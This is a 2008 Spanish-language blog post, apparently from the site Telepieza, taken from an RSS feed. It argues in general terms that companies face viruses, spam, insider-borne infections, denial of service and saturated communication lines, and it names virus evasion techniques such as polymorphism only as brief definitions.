<p>  Pero aún teniendo uno de los mejores planes de seguridad, la ciencia no es exacta y los llamados virus, troyanos, espías, escuchadores, spam y gusanos con su evolución de superación informática, vía localizar entradas ocultas en los sistema operativos, nuevas técnicas de programación o una evolución natural del propio software maligno, pueden colarse en nuestros sistemas informáticos y debilitar nuestra red e infectar nuestros ordenadores con la consiguiente pérdida económica para toda nuestra compañía.</p>
<p><span id="more-55"></span></p>
<p><strong>TOMAR MEDIDAS</strong></p>
<p> La llegada masiva de correo no deseado, virus e infección de ordenadores por Internet y siendo una de las mayores preocupaciones de los responsables de la compañía y sus clientes, tenemos que planificar de forma estratégica la seguridad de toda la red a nivel corporativo, incluyendo a todos los implicados tanto dentro y fuera de la compañía. Los trabajadores,  clientes y proveedores en su primera fase de control de seguridad, controlar el acceso a la red vía navegación y los correos electrónicos.</p>
<p> Para poder estar un poco tranquilo, tenemos que colocar un Firewall, un Antivirus y un Anti Spam entre la Intranet y la Internet, para poder controlar todos los flujos de comunicaciones entre el exterior y el interior de nuestra compañía.</p>
<p> El decir Firewall, Antivirus y Anti Spam, es comprar unos o dos ordenadores según el tráfico de comunicaciones que tenga nuestra red a nivel interno y externo.</p>
<p> Pero dicha inversión costosa no garantiza en ningún momento que no entren virus en nuestra compañía, para ello, tenemos que adquirir otro Antivirus y colocarlo en todos nuestros ordenadores o puestos de trabajo de la compañía.</p>
<p>  El motivo es porque últimamente todo el mundo tiene OpenDriver, CD, DVD, y demás dispositivos que son introducidos en los ordenadores del puesto de trabajo para poder visualizar su contenido y pueden estar infectados. La infección no viene desde fuera sino que es introducida desde dentro por una persona de confianza de la compañía.</p>
<p> Se dice que el peor hacker lo tenemos dentro de nuestra compañía, con tantos dispositivos diferentes no es de extrañar que sea así de real y nuestra seguridad e inversión no este garantizada.</p>
<p> El virus ideal (Desde el punto de vista de los autores de virus) sería aquél que se propaga de forma sigilosa, sin que nadie lo advierta, e inicia su actividad destructiva una vez que los ordenadores se encuentran ya infectados.</p>
<p>  <strong>El principal objetivo de los virus es la información contenida en los ordenadores.</strong></p>
<p>  Esta información puede tratarse tanto de trabajos realizados (textos, imágenes, bases de datos, hojas de cálculo&#8230;), como de programas instalados en el ordenador.</p>
<p>  Cuando se abre o ejecuta un archivo infectado por un virus, este último se activa y comienza sus operaciones. En otras ocasiones, minada condición, o que llegue una determinada fecha para activarse.</p>
<p><strong>MECANISMOS</strong></p>
<p>  Cada tipo de virus emplea diferentes mecanismos, tanto para realizar sus infecciones como para llevar a cabo sus objetivos. En ocasiones, incluso utilizan combinaciones de varias técnicas.</p>
<p> <font color="#ff0000">Ocultamiento:</font> Estos virus se camuflan o esconden, para no levantar sospechas.</p>
<p> <font color="#ff0000">Autocifrado:</font>    El virus codifica (o cifra) su firma (las características por las que se le identifica). Esto también hace difícil que el programa antivirus lo detecte.</p>
<p> <font color="#ff0000">Polimorfismo:</font>  Esta técnica permite al virus realizar su infección de forma diferente en cada ocasión, lo cual dificulta el trabajo de detección que realizan los programas antivirus.</p>
<p> <font color="#ff0000">Armouring:</font>     El virus impide ser examinado por los programas antivirus.</p>
<p><strong>LA MAYOR PLAGA EN INTERNET</strong></p>
<p>  La mayor plaga de Internet es el correo basura (en inglés también conocido como junk-mail o spam) a una cierta forma de inundar la red con muchas copias (incluso millones) del mismo mensaje, en un intento por alcanzar a gente que de otra forma nunca accedería a recibirlo y menos a leerlo.</p>
<p> Muchos de esos correos basura está constituido por anuncios comerciales, normalmente de productos dudosos, medicamentos (por ejemplo el viagra), métodos para hacerse rico o servicios en la frontera de la legalidad. No deja de amargar la existencia a los usuarios de Internet cuando encuentran sus buzones rebosando con correos del estilo:</p>
<p>            Gane millones trabajando desde casa.</p>
<p>            Chicas XXX ardientes te están esperando.</p>
<p>  Las listas de correo basura con las direcciones de correo electrónico de los clientes potenciales se crean frecuentemente cribando los mensajes de usenet, robando direcciones en las listas de distribución, buscando la información de nuestras páginas web o comprándolas en las bases de datos de los servicios en línea de Internet o bien buscando direcciones por la red.</p>
<p>  Pero la plaga aún crece día a día y los propios operadores de Internet las ISP, activan listas de direcciones no deseadas para que sus clientes al comprobar que están en dichas listas no les llegue correo basura a sus buzones.</p>
<p> Las operadoras de Comunicaciones y de Internet están realizando un gran esfuerzo para que los correos basura no bloqueen los anchos de banda de sus propias redes de comunicaciones. La realidad es que si sigue así el incremento de correo basura, internet no tendrá sentido por ser ineficaz al no dar servicio y rapidez a los internautas.</p>
<p><strong>LOS ORDENADORES NO PIENSAN</strong>.</p>
<p>  Los ordenadores están pensados para dar contestación a la demanda del operador o usuario, para eso se han creado dichas máquinas y sus servicios asociados para dar respuesta al ser humano, al fin y al cabo, son máquinas llenas de silicio y demás componentes electrónicos.</p>
<p> Pero si esa lógica de dar servicio, cientos o miles de ordenadores atacan a la vez a un servidor en concreto, tantas peticiones hacen que el ordenador deniegue el servicio o se bloquee.</p>
<p><strong>  Dicha teoría de denegar servicios o bloqueo del sistema o servidor es una de las más preocupante de los responsables de seguridad</strong>, el motivo es muy sencillo, los ordenadores están pensados para contestar siempre y ahí es donde radica nuestro problema más serio, más que los propios virus que están por la Red.</p>
<p><strong>NUESTRAS LINEAS DE COMUNICACIONES.</strong></p>
<p> El responsable de Comunicaciones, puede controlar las maquinas que están a su control (router, servidores, hub, swiches, ordenadores &#8230;&#8230;), pero fuera existen las líneas de comunicaciones que dependen de la operadora contratada y no controladas por el responsable informático de la compañía.</p>
<p> <strong>Otro de los grandes problemas de seguridad</strong> en la actualidad es la saturación de la línea de comunicaciones por empresas especializadas en bloquear dichas líneas para su beneficio propio.</p>
<p> Si las líneas de comunicaciones están saturadas, nuestros servicios más esenciales no funcionan, por ejemplo, conectar con otras sedes, enviar correo electrónico al exterior, navegar por internet y demás comunicaciones.</p>
<p>  <strong>CONCLUSIONES.</strong></p>
<p> Estaría escribiendo más y más sobre Seguridad, pero creo que dicho artículo puede dar una idea de que no sólo existen malos fuera , sino que dentro de nuestra compañía también los tenemos.</p>
<p> Los grandes problemas de seguridad no son los programas que realizan los llamados &#8220;MALOS&#8221;, sino que tenemos otro tipo de problemas como la denegación de servicios y la saturación de nuestras líneas de comunicaciones.</p>
<p>  <font color="#000080">Pero el reto más importante para los responsables de seguridad, es que las pequeñas infecciones crean un gran agujero de seguridad en nuestra compañía.</font></p>
<p><strong>Me voy a explicar con un ejemplo:</strong></p>
<p> Si como usuario tiene en un Ordenador un simple programa malicioso sin importancia , por ejemplo un espía, en otro me llega un montón de correo basura, en un servidor de la compañía se bloquea algunas veces un servicio, nuestra línea de comunicaciones la tenemos al 90% algunas horas del día y va lenta, y así hasta más y más &#8230;&#8230;.., eso significa que estamos siendo atacados en pequeñas escalas asumidas por los recursos de nuestra compañía, pero la realidad es que :</p>
<p> <font color="#ff0000"> ESTAN SIENDO ATACADOS NUESTROS SISTEMAS INFORMATICOS Y LINEAS DE COMUNICACIONES Y NO EXISTE REMEDIO EN LA ACTUALIDAD PARA EVITARLO.<br />
</font><font color="#ff0000"> </font></p>
<p><font color="#ff0000"> </font><font color="#000080">Es así de duro y claro, los programas actuales tanto los firewall como los anti-todo, no son capaces de parar los ataques a pequeña escala hacia nuestros sistemas y líneas de comunicaciones, si tenemos muchos ataques a pequeña escala eso significa  &#8230;  (TU MISMO, IMAGINA LO QUE SIGNIFICA).</font></p>
<p><font color="#000080"></p>
<p><strong><font color="#000000">Observaciones :</font></strong></p>
<p> Leyendo el artículo consigues conocimientos, Telepieza desea que recomiendes nuestro sitio a tus amigos , escribe tu opinión del post en comentarios y te suscribas en nuestro Weblog.</p>
<p></font></p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-9142530214884641";
//468x60, Gobierno
google_ad_slot = "5991722421";
google_ad_width = 468;
google_ad_height = 60;
//--></script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.telepieza.com%2Fwordpress%2F2008%2F01%2F11%2Flas-empresas-estan-lejos-de-la-verdadera-seguridad-informatica%2F&amp;title=Las%20empresas%20est%C3%A1n%20lejos%20de%20la%20verdadera%20seguridad%20inform%C3%A1tica" id="wpa2a_10"><img src="http://www.telepieza.com/wordpress/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.telepieza.com/wordpress/2008/01/11/las-empresas-estan-lejos-de-la-verdadera-seguridad-informatica/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

